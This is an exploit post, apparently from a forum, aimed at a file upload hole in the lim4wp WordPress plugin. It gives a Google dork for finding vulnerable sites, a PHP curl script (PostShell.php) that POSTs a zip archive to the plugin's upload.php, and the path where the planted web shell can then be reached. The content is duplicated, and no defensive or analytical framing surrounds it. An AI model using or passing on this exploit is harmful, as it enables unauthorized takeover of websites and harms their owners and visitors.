[align=LEFT][php]
Google Dork : inurl:/wp-content/plugins/lim4wp
Exploit : download zip file and extract
PostShell.php
<?php
$uploadfile="lo.zip";
$ch = curl_init("http://www.exemple.com/wordpress/wp-content/plugins/lim4wp/includes/upload.php?folder=./");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, array('Filedata'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>
[/php]
Acc Sh3ll : www.exemple.com/wordpress/wp-content/plugins/lim4wp/includes[/align]
Google Dork : inurl:/wp-content/plugins/lim4wp
Exploit : download zip file and extract
PostShell.php
<?php
$uploadfile="lo.zip";
$ch = curl_init("http://www.exemple.com/wordpress/wp-content/plugins/lim4wp/includes/upload.php?folder=./");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, array('Filedata'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>
[/php]
Acc Sh3ll : www.exemple.com/wordpress/wp-content/plugins/lim4wp/includes[/align]
نظر